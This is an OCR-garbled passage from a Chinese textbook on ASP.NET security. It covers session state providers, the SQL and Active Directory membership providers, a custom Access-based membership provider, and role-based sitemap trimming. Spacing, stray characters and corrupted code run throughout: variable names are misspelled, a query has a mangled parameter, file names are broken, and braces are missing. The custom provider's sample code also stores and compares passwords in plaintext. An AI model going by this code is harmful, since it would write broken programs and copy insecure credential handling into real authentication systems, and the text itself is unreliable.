HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Applicati 


on\OdbcSessionstateStore 


如 果 不 想 让 实例 提供 程序 将 异常 写 入 事件 日 志 ， 可 以 在 web.config 文件 中 将 自 定义 
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writeExceptionsToEventLog 属性 设置 为 false。 
3， 对 Session_OnEnd 事 件 的 支持 


实例 会 话 状态 存储 提供 程序 不 支持 在 Global.asax 文件 中 定义 的 Session_OnEnd 事件 ， 
原因 是 Access 数据 库 无 法 将 会 话 的 到 期 日 期 和 时 间 信 息 通知 会 话 状态 存储 提供 程序 , 会 话 
状态 存储 提供 程序 必须 自行 查询 。 无 法 预知 何 时 将 使 用 会 话 状态 存储 提供 程序 ， 一 般 不 会 
在 会 话 超时 的 准确 时 刻 引 发 Session_OnEnd 事件 。 

因此 ， 示 例会 话 状态 存储 提供 程序 中 的 SetItemExpireCallback 方法 实现 返回 false， 通 
知 不 支持 SessionStateModule Session OnEnd 事件 。 


4. 清理 过 期 的 会 话 数据 


由 于 示例 会 话 状 态 存储 提供 程序 不 支持 Session_OnEnd 事件 ， 因 此 不 会 自动 清理 过 期 
的 会 话 项 数据 ， 开 发 人 员 可 以 使 用 下 面 的 代码 定期 删除 数据 存储 区 中 过 期 的 会 话 信息 : 

string commandString = "DELETE FROM Sessions WHERE Expires < 2"; 

OdbcConnection conn = new OdbcConnection (connectionString) ; 

OdbcCommand cmd = new OdbcCommand (commandSstring, conn); 

cmd.Parameters.Add ("@Expires", OdbcType.DateTime) .Value = DateTime.Now; 

conn.Open(); 

cmd.ExecuteNonQuery (); 

conn.Close(); 


5. 生成 示例 提供 程序 


为 使 用 示例 提供 程序 ， 可 以 将 开发 者 的 源 代码 放 到 应 用 程序 的 App_Code 日 录 下 。 需 
要 注意 的 是 ， 如 果 应 用 程序 的 App_Code 目录 中 已 经 有 源 代码 ， 则 必须 添加 使 用 与 目录 中 
现 有 代码 相同 的 示例 提供 程序 版 本 。 当 请 求 应 用 程序 时 ，ASP.NET 将 对 该 提供 程序 进行 
编译 。 

可 以 将 示例 提供 程序 作为 库 进 行 编 译 ， 并 将 其 放 入 Web 应 用 程序 的 Bin 目录 中 , 或 可 
以 对 其 进行 强 命名 并 放 入 GAC 中 。 下 面 的 命令 演示 将 示例 代码 复制 到 Visual Basic 的 
OdbcSessionStateStore vb 文件 和 C# 的 OdbcSessionStateStore.cs 文件 后 如 何 使 用 命令 行 编译 
器 编译 示例 提供 程序 : 


csc /out:OdbcSessionStateStore.dll /t:library OoqdbcSessionStateStore.cs 
/r:System.Web.dl1 /r:System.Configuration.dll 


6. 在 ASP.NET 应 用 程序 中 使 用 示例 提供 程序 


下 面 的 实例 演示 一 个 已 配置 为 使 用 示例 提供 程序 的 ASPNET 应 用 程序 的 web.config 
文件 。 该 实例 使 用 名 为 SessionState 的 ODBC DSN 获取 Access 数据 库 的 连接 信息 。 

车 要 使 用 示例 提供 程序 , 则 需要 创建 SessionState 系统 , 或 提供 到 数据 库 的 有 效 ODBC 
连接 字符 串 。 

实例 配置 了 网 站 的 窗 体 Forms 身份 验证 ， 并 包括 允许 用 户 登 录 名 为 login.aspx 的 
ASPNET 页 面 。 

其 配置 节 XML 代码 如 下 : 
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在 默认 的 情况 下 ，ASP.NET 中 的 成 员 管理 功能 来 自 两 个 自 带 的 Provider 类 库 。 一 个 是 
SqlMembershipProvider 类 ; 另 一 个 是 ActiveDirectoryMembershipProvider 类 。SqlMembers- 
hipProvider 类 是 与 SQL Server 协同 工作 对 用 户 进 行 管理 的 , 而 ActiveDirectoryMembership- 
Provider 类 则 是 依赖 Active Directory (活动 目录 ) 对 用 户 进 行 管理 操作 。 

本 章 将 着 重 讲解 NET 特有 的 Provider 类 ， 以 及 利用 它们 设计 安全 的 验证 模式 。 


10.1 ASP.NET 的 MemberShip Provider 


下 面 对 SqlMembershipProvider 和 ActiveDirectoryMembershipProvider 进行 说 明 。 
1. SqlMembershipProvider 类 


SqlMembershipProvider 类 提供 了 成 员 管 理 所 需 的 所 有 功能 ， 同 时 也 是 ASPNET 应 用 
程序 首选 的 成 员 管 理 功能 的 提供 者 。 使 用 SqlMembershipProvider 类 可 以 非常 容易 地 为 不 同 
规模 的 ASP.NET 站 点 程序 提供 成 员 管 理 功 能 

SqlMembershipProvider 类 提供 的 成 员 管 理 功 人 E 还 是 要 依赖 Microsoft SQL Server。 站 点 
用 户 或 者 说 是 成 员 ， 乃 至 相关 的 角色 信息 都 存放 在 SQL Server 的 数据 库 服务 器 中 。 所 以 ， 
开发 者 使 用 SqlMembershipProvider 进行 成 员 管 理 的 时 候 , 也 可 以 直接 访问 数据 库 的 相关 表 
对 用 户 信 息 进 行 直 接 操作 。 

1) Aspnetdb 数据 库 

为 了 清楚 地 描述 用 户 、 成 员 信息 在 SQL Server 数 据 库 中 的 保存 方式 ,这 里 对 SQL Server 
服务 器 上 的 aspnetdb 数据 库 结构 进行 讲解 。Aspnetdb 数据 库 中 有 几 个 非常 重要 的 、 与 
membership 功能 密切 相关 的 数据 表 ， 下 面 对 它 们 进行 简略 的 介绍 。 

(1) Aspnet Applications 表 : 主要 存放 应 用 程序 的 名 称 信息 以 及 标识 符 (ID ) ， 定 义 
如 下 : 


CREATE TABLE [dbo] .aspnet Applications ( 
ApplicationName nvarchar (256) NOT NULL UNIQUE, 
LoweredApplicationName nvarchar (256) NOT NULL UNIQUE, 
ApplicationId uniqueidentifier PRIMARY KEY NONCLUSTERED 
DEFAULT NEWID(), Description nvarchar(256) ) 








虽然 Aspnet_Application 表 的 内 容 并 不 多 ， 但 是 它 非常 重要 ， 因 为 ASPNET 2.0 中 ， 
所 有 基于 SQL Server 的 服务 提供 程序 都 会 用 到 这 个 表 内 部 的 信息 。 举 例 来 说 ， 当 
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SqlMembershipProvider 查找 用 户 名 abc 时 ， 会 查找 属于 对 应 的 应 用 程序 的 一 个 用 户 abc。 

在 Aspnetdb 数据 库 中 ， 还 有 一 个 Aspnet Applications_CreateApplication 存储 过 程 ， 专 
门 用 来 向 Aspnet Application 表 添 加 新 的 应 用 程序 标识 。 

(2) Aspnet Users 表 : 存放 用 户 基本 信息 ， 包 括 用 户 名 、 应 用 程序 的 标识 符 等 。 它 的 
定义 如 下 : 

CREATE TABLE [dbo] .aspnet Users ( 

ApplicationId uniqueidentifier NOT NULL FOREIGN KEY REFERENCES 

[dbo] .aspnet Applications (ApplicationId), 
UserId uniqueidentifier NOT NULL PRIMARY KEY NONCLUSTERED 
DEFAULT NEWID(), 
UserName nvarchar (256) NOT NULL, 
LoweredUserName nvarchar (256) NOT NULL, 
MobileAlias nvarchar(16) DEFAULT NULL, 
IsAnonymous bit NOT NULL DEFAULT 0, 
LastActivityDate DATETIME NOT NULL) 
表 中 ApplicationId 字段 通过 外 键 与 Aspnet_application 表 进 行 关联 。 每 个 Users 表 中 的 
记录 都 有 一 个 相关 联 的 ApplicationId 用 来 标识 用 户 所 属 的 应 用 程序 。Aspnet_Users 表 是 其 
他 成 员 和 角色 相关 表 的 基础 , ASP.NET 应 用 程序 的 用 户 和 角色 管理 功能 都 与 它 有 很 大 的 关 
系 。Aspnet_users 表 中 的 userid 字段 是 一 个 GUID 数据 类 型 的 标识 符 ， 和 ApplicationId 类 
似 ， 它 用 来 标识 一 个 特定 的 用 户 ，Aspnet_users 表 将 通过 userId 字段 与 其 他 的 表 联 系 。 
LastActivityDate 字段 用 来 判断 用 户 是 否 在 线 和 失效 。LastActivityDate 字段 值 会 被 下 列 
的 事件 更 新 : 
口 成 员 管理 程序 会 在 用 户 登 录 的 时 候 更 新 LastActivityDate 状态 。 
口 角色 管理 程序 可 以 在 建立 用 户 角色 之 前 自动 更 新 此 状态 。 例 如 ， 在 角色 管理 程序 
和 Windows 认证 结合 使 用 的 时 候 。 

口 当 用 户 档案 被 创建 或 更 新 时 ，LastActivityDate 字段 的 值 会 被 修改 。 

口 Web Part (部 件 ) 的 用 户 个 性 化 信息 被 修改 的 时 候 。 在 aspnetdb 数据 库 中 ， 有 两 个 
与 aspnet_users 表 有 关 的 存储 过 程 : Aspnet_users_CreateUser 和 Aspnet_users_Delet- 
eUser， 用 来 添加 和 删除 用 户 。 

(3) Aspnet_Membership 表 : 提供 了 基本 的 成 员 管 理 功 能 相关 的 字段 。 它 保存 了 用 户 
的 密码 、 身 份 的 有 效 性 、 是 否 通 过 了 验证 、 注 册 信 息 等 。 下 面 是 对 aspnet_membership 表 的 
一 些 重要 的 字段 进行 说 明 ， 以 便 读者 对 membership 表 有 更 清晰 的 理解 。 

ApplicationId: 指明 了 数据 行 中 的 用 户 关联 的 应 用 程序 ID。 

UserId: aspnet_membership 表 的 主键 ， 代 表 用 户 编号 。 

Password: 该 字段 保存 了 用 户 的 密码 信息 ， 与 PasswordFormat 和 PasswordSalt 字 
段 共同 规定 了 密码 的 存放 方式 。 密 码 的 存放 方式 分 为 5 种 : 明文 方式 、 加 密 方式 、 
散 列 加 密 方式 、E-mail 方式 和 PasswordQuestion 方式 。 其 中 ，PasswordQuestion 方 
式 表示 如 果 成 员 管理 配置 设 定 了 使 用 密码 提问 和 回答 (PasswordAnswer) ， 那 么 
在 这 个 字段 中 将 保存 用 户 选 定 的 密码 提问 。 

(4) Aspnet Role 表格 保存 了 应 用 程序 所 设置 的 角色 ， 以 及 这 些 角色 的 标识 和 描述 等 
信息 。 

(5) Aspnet UsersInRole 表 具 体 定 义 了 每 个 用 户 所 属 的 角色 。 





日 日 . 蝇 


人 
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2) SqlMembershipProvider 类 特有 的 配置 参数 

于 SqlMembershipProvider 使 用 SQL Server 作为 其 数据 存储 ， 所 以 在 配置 中 存在 与 

SQL 相关 的 配置 项 : 

口 ConnectionStringName: 一 个 有 效 的 ConnectStringName 的 值 ,存在 于 machine.config 

或 者 是 web.config 文件 <connectionstrings/> 配 置 节点 中 。 

口 CommandTimeout: 该 值 表 示 成 员 管 理 程序 执行 SQL 操作 的 有 效 时 间 。 如 果 执 行 
时 间 超 过 这 个 设 定 的 值 ， 那 么 就 会 超时 。 默 认 情况 下 ， 这 个 值 为 30 秒 。 




















2. ActiveDirectoryMembershipProvider 类 


ActiveDirectoryMembershipProvider 类 支持 所 有 的 成 员 管理 功能 。 开 发 人 员 可 以 在 
ActiveDirectory (活动 目录 ) 的 基础 上 创建 和 管理 用 户 。 另 外 ， 还 可 以 把 
ActiveDirectoryMembershipProvider 的 使 用 扩展 到 非 ASPNET 的 应 用 程序 中 。 

ActiveDirectoryMembershipProvider 的 成 员 管理 功能 基于 活动 目录 。Provider 把 活动 目 
录 当 作 LDAP 〈 轻 量 级 目录 访问 协议 ) 服务 器 进行 访问 。Provider 与 LDAP 服务 器 交互 的 
时 候 ， 会 以 LDAP 协议 与 服务 器 进行 通信 ， 然 后 返回 结果 。Provider 并 不 会 把 活动 目录 作 
为 一 种 身份 认证 的 方式 ， 仅 仅 返回 与 LDAP 服务 器 通信 的 结果 。 

在 某 些 企业 或 组 织 中 ， 活 动 目 录 相 当 的 复杂 ， 可 能 包括 数 个 域 ， 同 时 域内 部 以 及 域 之 
间 的 关系 也 可 能 非常 复杂 。 但 是 ASPNET 中 的 单个 ActiveDirectoryMembershipProvider 只 
能 对 单个 域 或 单个 域 的 子 集 进行 操作 ， 如 果 需 要 在 多 个 域 中 工作 ， 那 么 需要 配置 多 个 不 同 
的 ActiveDirecotoryMembershipProvider 实例 。 

ActiveDirectoryMembershipProvider 类 提供 和 SqlMembershipProvider 类 相同 的 成 员 管 
理 功 能 ， 但 在 配置 上 有 一 些 区 别 。 接 下 来 我 们 介绍 ActiveDirectoryMembershipProvider 的 
配置 。 

1) Provider 的 配置 

下 面 是 最 简单 的 Provider 配置 方法 : 


<connectionstrings> 
<add name="adconnection" connectionSstring="LDAP://domain.microsoft.com"/> 
<connectionstrings/> 





<membership defaultProvider="myADProvider"> 
<providers> 
<clear/> 
<add name="myADProvider" 
type="System.Web.Security.ActiveDirectoryMembershipProvider" 
connectionStringName="adconnection"/> 
</providers> 
</membership> 


上 面 配置 中 ,首先 在 machine.config 或 web.config 的 connectionStrings 部 分 添加 对 LDAP 
服务 器 的 连接 字符 串 ， 然 后 在 membership 配置 节 的 Providers 中 增加 一 个 
ActiveDirectoryMembershipProvider 类 的 定义 ， 并 使 用 前 面 定义 的 连接 字符 串 名 ， 接 着 在 
membership 的 属性 defaultProvider 中 指定 刚刚 定义 的 Provider 的 名 字 ， 最 后 让 程序 使 用 
ActiveDirectoryMembershipProvider 作为 成 员 管 理 功 能 的 提供 者 。 
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2) 目录 连接 的 设 定 
与 SQL Provider 类 似 ， 需 要 提供 一 个 连接 字符 串 让 Provider 知道 从 什么 地 方 读 取 和 写 
入 信息 。 不 过 连接 到 活动 目录 服务 器 的 连接 字符 串 与 连接 到 SQL Server 的 有 一 些 区 别 。 除 
了 不 能 在 连接 字符 串 的 属性 中 指定 用 户 名 、 密 码 以 及 安全 性 的 设置 以 外 ， 活 动 目 录 的 连接 
字符 串 的 格式 也 有 很 大 的 不 同 ， 连 接 字符 串 支 持 几 种 不 同 的 格式 。 举 例 来 说 ， 如 果 应 用 程 
序 工作 在 Microsoft.com 域 中 ， 有 一 个 域 控 制 器 叫做 domainController， 下 面 几 种 连接 字符 
串 的 格式 都 可 以 被 接受 : 
口 LDAP: //Microsoft.com。 
DQ LDAP: //domainController.microsoft.com。 
口 LDAP: //Microsoft.com/OU=myOU,DC=Microsoft,DC=com。 
口 LDAP: //domainController.microsoft.com/OU=myOU,DC=Microsoft,DC=com。 
基于 SQL Server 的 成 员 管理 程序 和 ActiveDirectoryMembershipProvider 的 使 用 大 同 小 
异 ， 这 里 就 不 再 对 ActiveDirectoryMembershipProvider 进行 过 多 的 讲解 了 。 

















10.2 ”实现 自 定 义 的 MembershipProvider 类 


很 多 业务 程序 都 需要 一 个 基于 数据 库 的 成 员 管理 系统 来 管理 用 户 和 用 户 的 相关 信息 ， 
当然 也 可 以 使 用 活动 目录 甚至 文本 文件 来 保存 这 些 信 息 。 ASP.NET 自 带 的 两 种 成 员 管 理 程 
序 集 可 以 依赖 SQL Server 和 活动 目录 进行 工作 。 

程序 工作 的 环境 千差万别 , 很 多 时 候 企业 或 组 织 不 会 使 用 SQL Server 或 活动 目录 作为 
成 员 数 据 的 存储 。 于 是 ， 自 定义 成 员 管理 程序 集 就 应 运 而 生 了 。ASP.NET 中 ,成员 管理 的 
功能 是 以 提供 者 (provider) 模式 进行 设计 的 , 这 就 使 自 定义 成 员 管理 程序 集 变 得 非常 方便 。 

在 前 面 的 章节 里 ， 提 到 了 ActiveDirectoryMembershipProvider 和 
SqlmembershipProvider， 这 两 个 类 都 是 继承 自 system.web.security.MembershipProvider 抽象 
类 ， 所 以 要 实现 一 个 自 定义 的 成 员 管 理 提供 程序 集 就 必须 提供 一 个 MembershipProvider 的 
自 定义 实现 ， 最 后 通过 配置 把 这 个 自 定义 的 Provider 程序 集 插入 到 ASP.NET 应 用 程序 中 。 
下 面 举例 说 明 如 何 实现 一 个 自 定 义 的 成 员 管 理 Provider 类 。 

接 下 来 的 这 个 例子 演示 了 如 何 编写 一 个 基于 Access 数据 库 的 成 员 管理 类 。 

首先 ,建立 一 个 新 的 ASP.NET 站 点 AccessMembershipProvider, 在 站 点 下 添加 App_Data 
目录 ,打开 目录 所 在 物理 路 径 的 文件 夹 , 新 建 Access 数据 库 members.mdb, 在 members.mdb 
中 建立 membership 表 ， 如 图 10-1 所 示 。 

ep ed Type FE 本 | 
password Text 密码 
Email Text 邮件 


passwordQuestion Text 密码 问题 
passwordAnswer Text 密码 答案 


图 10-1 membership 表 


a 
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接着 ， 开 始 定义 需要 的 成 员 管 理 类 。 在 站 点 中 添加 AccessMembershipProvider 类 ， 
ASPNET 自动 将 它 添加 到 App Code 路 径 下 ， 使 类 AccessMembershipProvider 继承 
MembershipProvider 抽象 类 ， 代 码 如 下 所 示 : 


public class AccessMembershipProvider:MembershipProvider 

{ 

} 

为 了 实现 MembershiProvider 的 基本 功能 , 需要 在 AccessMembershipProvider 类 中 提供 
抽象 成 员 方法 的 具体 实现 。 其 中 ，Iitialize 方法 、CreateUser 方法 和 Validate 方法 是 非常 重 
要 的 因素 ， 必 须 正 确 地 实现 才能 使 AccessMembershipProvider 类 正常 工作 。 下 面 代 码 演示 
了 Initialize 方法 的 实现 : 

public override void Initialize(string name, 


System.Collections.Specialized.NameValueCollection config) 














if (config["requiresQuestionAndAnswer"] =="true") 
requireQuestionAndAnswer = true; 
if (config["minRequiredPasswordLength"] != null) 


{ 
minRequiredPasswordLength = int.Parse(config["minRequiredPa- 
sswordLength"]); 
} 


else 
_minRequiredPasswordLength = 6; 
if (config["connectionString"] != null) 
_connstr = config["connectionstring"]; 
else 


throw new Exception("no connection string defined!"); 
base.Initialize (name, config); 


} 

在 Initialize 方法 的 重 载 中 ， 程 序 从 配置 属性 中 读 取 requiresQuestionAndAnswer、 
minRequiredPasswordLength 以 及 connectionString 属性 值 ， 对 Provider 进行 初始 化 。 如 果 配 
置 中 缺少 connectionString 属性 ， 则 会 抛 出 一 个 异常 。 配 置 的 最 后 ， 要 执行 基 类 的 Initialize 
方法 。 可 以 发 现 ， 在 Initialize 方法 中 ， 不 仅 获取 了 是 否 要 求 密码 提问 和 答案 的 属性 ， 还 获 
得 了 最 小 密码 长 度 的 配置 属性 ， 默 认 值 为 6， 其 中 最 重要 的 是 连接 字符 串 属性 ， 这 些 配 置 
值 都 会 保存 在 私有 成 员 变 量 中 。 

成 员 管理 有 两 个 基本 功能 , 第 一 个 是 创建 用 户 功 能 , 该 功能 通过 CreateUser 方法 实现 。 
下 面 是 CreateUser 方法 的 代码 : 

public override MembershipUser CreateUser (string username, 

string password, string email, string passwordQuestion, 


string passwordAnswer, bool isApproved, 
object providerUserKey, out MembershipCreateStatus status) 


OleDbConnection oledbconnection = new OleDbConnection( connstr); 
string sql = "INSERT INTO Membership values ("+ 
"@username ,@password ,@email ,"+ 
"@passwordQuestion ,@passwordAnswer)"; 
OleDbCommand oleCmd = new OleDbCommand(sql, oledbconnection); 
oleCmd.Parameters.AddWithValue ("@username", username); 
oleCmd.Parameters.AddWithValue ("@password", password); 


DO 
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oleCmd.Parameters.AddWithValue ("@email", email); 
oleCmd.Parameters.AddWithValue ("@passwordQuestion", passwordQuestion); 
oleCmd.Parameters.AddWithValue ("@passwordAnswer", passwordAnswer); 
try 
oleCmd.Connection.Open(); 
int ret = oleCmd.ExecuteNonQuery(); 
oleCmd.Connection.Close(); 
status = MembershipCreateStatus.Success; 
MembershipUser user = new MembershipUser 
("AccessMembershipProvider", 
username, null, email, passwordQuestion, 
null, true, false, DateTime.Now, DateTime.MinValue, 
DateTime .MinValue, DateTime.MinValue, DateTime. 
MinValue); 
return user; 
! 
catch (Exception e) 
并 
status = MembershipCreateStatus.UserRejected; 
return null; 


上 


在 CreateUser 方法 中 ， 通 过 oleDbConnection 打开 和 Access 数据 库 的 连接 ， 使 用 
OleDbCommand 对 象 向 Access 数据 库 的 Membership 表 添 加 用 户 的 注册 信息 。 通 过 status 
输出 参数 来 反映 用 户 是 否 创建 成 功 。 最 后 返回 一 个 MembershipUser 对 象 , 这 个 对 象 包含 了 
用 户 注 册 时 使 用 的 信息 。 

成 员 管理 的 第 二 个 基本 功能 就 是 对 用 户 的 登录 进行 验证 ， 这 个 功能 通过 ValidateUser 
方法 实现 ， 方 法 的 代码 如 下 : 


public override bool ValidateUser (string username, string password) 
上 
OleDbConnection conn = new OleDbConnection( connstr); 
string sql = "Select * From Membership WHERE "+ 
"username=@username AND password=@password"; 
OleDbCommand oleCmd=new OleDbCommand (sql,conn); 
oleCmd.Parameters.AddWithValue ("@username", username); 
oleCmd.Parameters.AddWithValue ("@password", password); 
try 
oleCmd.Connection.Open (); 
OleDbDataReader reader = oleCmd.ExecuteReader (); 
if (reader.HasRows) 
return true; 
else 
return false; 
} 
catch (Exception e) 
{ 
return false; 
} 
finally 
i 
conn.Close(); 


上 


ss 
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ValidateUser 方法 通过 对 数据 库 中 的 记录 进行 搜索 ， 查 找 是 否 有 符合 输入 的 用 户 名 和 
密码 来 完成 操作 。 

上 面 3 个 方法 是 Provider 类 的 基本 方法 ， 需 要 精确 的 实现 。 至 于 其 他 的 方法 ， 则 可 以 
先 提供 空 方法 ， 再 一 步 一 步 进行 完善 。 在 实现 了 上 面 3 个 基本 方法 的 基础 上 ， 下 面 又 实现 
了 删除 用 户 的 DeleteUser 方法 、 更 改 密码 的 ChangePassword 方法 和 修改 密码 提问 和 答案 的 
ChangePasswordQuestionAnswer 克 法 。 

AccessMembershipProvider 的 代码 实现 了 成 员 管 理 的 基本 功能 ， 现 在 就 在 
AccessProviderDemo 站 点 中 试 着 应 用 它 。 要 使 用 这 个 Provider， 首 先 应 该 在 web.config 中 
添加 下 面 的 配置 代码 : 














<membership defaultProvider="AccessMembershipProvider"> 

<providers> 

<add name="AccessMembershipProvider" type="AccessMembershipProvider" 

requiresQuestionAndAnswer="true" connectionString="Provider=Microsoft.- 
Jet .OLEDB.4.0;Data Source=C:\Projects\websites\websites\Accessprovide-— 
rDemo\App Data\Members.mdb;Persist Security Info=False"/> 

</providers> 
</membership> 


Add 配置 节 中 添加 了 刚才 编写 的 提供 者 ， 取 名 叫 AccessMembershipProvider，type 属 
性 的 值 应 该 为 提供 者 的 类 名 ， 这 个 属性 必须 一 致 。 最 后 指定 Access 数据 库 的 连接 字符 串 。 
然后 在 membership 配置 节 中 指定 默认 的 提供 者 为 AccessMembershipProvider 即 可 完成 
配置 。 

这 时 ， 可 以 在 程序 中 使 用 AccessMembershipProvider 的 功能 进行 成 员 管 理 了 。 在 
default.aspx 页 面 中 ,添加 CreateUserWizard 控 件 和 LoginView 控 件 . 在 LoginView 的 sSLogged 
模板 中 ， 添 加 LoginName 和 LoginStatus 控件 ;在 LoginView 的 Anonymonu 模板 中 ， 添 加 
LoginStatus 控件 ， 如 图 10-2 所 示 。 

然后 ， 添 加 Login.aspx 页 面 ， 这 个 页 面 将 提供 登录 的 功能 。Login.aspx 页 面 代 码 如 下 : 


<%@ Page Language="C#" AutoEventWireup="true" CodeFile="login.aspx.cs" 
Inherits="login"%> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.o0org/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<html xmlns="http://www.w3.0org/1999/xhtml" > 
<head runat="server"> 
<title>Untitled Page</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
<asp:Login ID="Loginl" runat="server"> 
</asp:Login> 
</div> 
</form> 
</body> 
</html> 
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图 10-2 用户 创 建 和 登录 


如 果 用 户 没 有 登录 ， 在 default.aspx 页 面 中 单 击 Login 按钮 ， 就 会 进入 Login.aspx 页 面 
进行 登录 ; 如 果 用 户 已 经 通过 登录 ， 将 会 返回 default.aspx 页 面 ， 此 时 default.aspx 页 面 会 
显示 登录 的 用 户 名 ， 如 图 10-3 所 示 。 























10-3 ”登录 后 的 default.aspx 页 面 


上 面 的 页 面 使 用 AccessMembershipProvider 作为 成 员 管 理 的 服务 提供 者 ， 这 时 可 以 通 
过 CreateUserWizard 控件 添加 新 的 用 户 。 


Ws 
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本 节 详 细 说 明了 如 何 创 建 一 个 自 定义 的 成 员 管 理 类 ， 并 以 一 个 站 点 的 实例 证 明了 自 定 
义 成 员 管 理 类 的 可 用 性 。 

这 个 例子 让 读者 理解 如 何 创建 一 个 自 定义 的 成 员 管理 的 服务 类 ， 更 重要 的 是 让 读者 能 
够 理解 ASPNET 通过 Provider 模式 带 给 应 用 程序 的 灵活 性 .这 种 灵活 性 主要 体现 在 可 以 自 
行 扩 展 ASPNET 自 带 的 服务 类 ， 并 能 够 通过 简单 的 配置 用 自 定义 的 服务 类 替换 默认 的 服 
务 类 。ASPNET 中 ， 广 泛 地 使 用 了 Provider 模式 ， 不 仅仅 是 成 员 管理 ， 也 在 角色 管理 、 
ADONET (数据 库 访问 ) 、 用 户 个 性 化 等 方面 发 挥 了 巨大 作用 。 








10.3 ”安全 使 用 SiteMap 


本 章 前 面 的 内 容 讨论 了 ASP.NET 的 成 员 和 角色 管理 的 基本 内 容 ， 并 讲解 了 如 何 实现 
自 定义 的 成 员 管理 服务 类 。 现 在 来 看 一 个 实际 问题 ， 然 后 使 用 本 章 的 知识 提出 一 种 可 行 的 
解决 方案 。 

ASP.NET 提供 了 一 个 可 编程 的 API， 而 其 中 的 角色 管理 部 分 使 开发 者 能 够 定义 一 组 角 
色 并 把 用 户 和 角色 关联 起 来 。 开 发 者 可 以 为 角色 指定 不 同 的 访问 权限 ， 从 而 通过 角色 和 权 
限 来 为 用 户 提供 不 同 级 别 的 服务 。 举 例 来 说 ，ASP.NET 站 点 有 一 组 管理 页 面 一 一 允许 一 组 
可 信任 的 用 户 通过 访问 它 执行 一 些 管理 操作 。 

ASP.NET 中 可 以 定义 角色 ,这 个 角色 可 以 访问 这 些 管理 页 面 , 然后 将 相应 的 用 户 与 这 
个 角色 关联 起 来 。 这 样 就 可 以 实现 页 面 对 用 户 的 授权 。 当 建立 站 点 导航 图 时 ， 情 况 就 变 得 
复杂 了 。 因 为 按照 一 般 的 站 点 导航 图 的 设计 ， 导 航 图 是 静态 的 ， 也 就 是 说 ， 没 有 经 过 授权 
的 用 户 也 可 以 在 导航 图 中 看 到 授权 页 面 的 链接 ， 而 希望 能 够 对 不 同 级 别 的 用 户 显示 不 同 的 
站 点 导航 图 。ASP.NET 的 站 点 导航 功能 提供 了 安全 修剪 功能 ， 当 使 用 支持 安全 修建 功能 的 
站 点 导航 功能 时 ， 导 航 节 点 只 对 获得 授权 的 用 户 进行 显示 ， 这 意味 着 ， 不 属于 该 用 户 授权 
范围 的 导航 节点 不 会 出 现在 导航 菜单 中 。 

这 个 功能 实用 ， 通 过 ASP.NET 的 会 员 和 角色 系统 以 及 导航 图 ， 开 发 人 员 仅 仅 通过 配 
置 就 可 以 实现 基于 角色 的 导航 功能 ， 接 下 来 介绍 如 何 实 
现 基于 角色 的 导航 地 图 。 TS3EEEEEE 
首先 ， 在 Visual Studio 中 创建 RoleBasedNavigation | 局 j 量 .本 加 | 西 入 
站 点 。 在 站 点 中 加 入 3 个 文件 夹 ，AdminPages、Guest 和 SA Mima 
UserPages， 然 后 在 3 个 文件 夹 中 加 入 页 面 ， 如 图 10-4 | 上。 祁 各 2” 


所 示 。 田 - [加 GuestPagel.aspx 


然后 ， 打 开 ASP.NET 配置 站 点 进入 Security 配置 部 上 富 erPaoes 




















分 ， 对 会 员 / 角 色 系 统 进行 设置 。 在 单 击 名 为 enable role ep 
的 角色 创建 按钮 之 后 ， 创 建 3 个 角色 ,分别 是 Admin、 Ee 
Guest 和 User。 再 创建 3 个 用 户 guestuser、testuser Bw Stem=p 











和 WebAdmin。 在 创建 用 户 的 时 候 , 同时 为 这 3 个 用 户 分 
别 指定 相应 的 角色 : 为 guestuser 指定 Guest 角色 ,为 
TestUser 指定 User 角色 ， 为 WebAdmin 指定 Admin 和 





图 10-4 ”站 点 文件 夹 
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User 角色 。 最 后 再 加 入 一 个 AnonymousUser， 不 过 不 为 该 用 户 指定 任何 角色 属性 。 

配置 站 点 的 成 员 和 角色 后 , 为 站 点 中 3 个 新 添加 的 目录 创建 Access Rule (访问 规则 ) ， 
规则 如 下 : AdminPages 目录 仅 允 许 具 有 Admin 角色 的 用 户 访问 ，UserPages 目录 允许 包括 
具有 User 或 Admin 角色 的 用 户 访 问 ，Guest 目录 人 允许 经 过 授权 的 所 有 用 户 访问 。 

默认 情况 下 ， 站 点 地 图 并 没有 启用 安全 修剪 技术 。 不 管 什么 角色 的 用 户 访问 站 点 ， 也 
不 论 定义 怎么 样 的 授权 规则 ， 只 要 用 户 有 权 查 看 页 面 ， 那 么 页 面 中 的 站 点 地 图 就 会 完全 显 
示 出 来 。 通 过 启用 安全 修剪 ， 站 点 地 图 中 的 节点 将 会 和 相应 的 页 面授 权 相 关联 ， 从 而 对 站 
点 地 图 中 的 节点 进行 有 选择 的 显示 。 

安全 修剪 技术 首先 为 站 点 提供 一 个 站 点 地 图 ， 在 解决 方案 窗口 中 为 站 点 新 增 一 个 
web.sitemap 站 点 地 图 。 

在 站 点 地 图 定义 文件 中 输入 下 面 的 配置 代码 : 





<?xml version="1.0" encoding="utf-8" ?> 
<siteMap xmlns="http://schemas.microsoft.com/AspNet/SiteMap-File-1.0" > 
<siteMapNode title="RootNode" roles="*"> 
<siteMapNode title="Admin" description="administration" roles="Admin"> 
<siteMapNode url="~/Adminpages/adminpagel .aspx" title="adminpagel"/> 
</siteMapNode> 
<siteMapNode title="User" description="UserPages" roles="Users,Admin"> 
<siteMapNode url="~/UserPages/UserPagel.aspx" title="UserPagel"/> 
</siteMapNode> 
<siteMapNode title="Guest" description="GuestPages" roles="Guest,Users, 
Rdmin"> 
<siteMapNode url="~/Guest/GuestPagel .aspx" title="GuestPagel"/> 
</siteMapNode> 
<siteMapNode title="DefaultPage" description="default" url="default. 
aspx"/> 
</siteMapNode> 
</siteMap> 


要 使 用 站 点 地 图 的 安全 修剪 功能 ， 就 要 在 站 点 地 图 的 每 个 需要 修剪 的 
点 一 一 siteMapNode 中 使 用 roles 属性 ,在 roles 属性 中 指定 可 以 访问 该 结 点 的 角色 ， 角色 可 
以 指定 多 个 ， 并 用 逗号 进行 分 隔 。 

为 了 使 用 站 点 地 图 ， 还 需要 在 web.config 中 添加 以 下 的 配置 代码 : 





<siteMap defaultProvider="XmlSiteMapProvider" enabled="true"> 
<providers> 
<add name="XmlSiteMapProvider" description="Default SiteMap provider." 
type="System.Web.XmlSiteMapProvider " siteMapFile="Web.sitemap" 
securityTrimmingEnabled="true"/> 
</providers> 
</siteMap> 


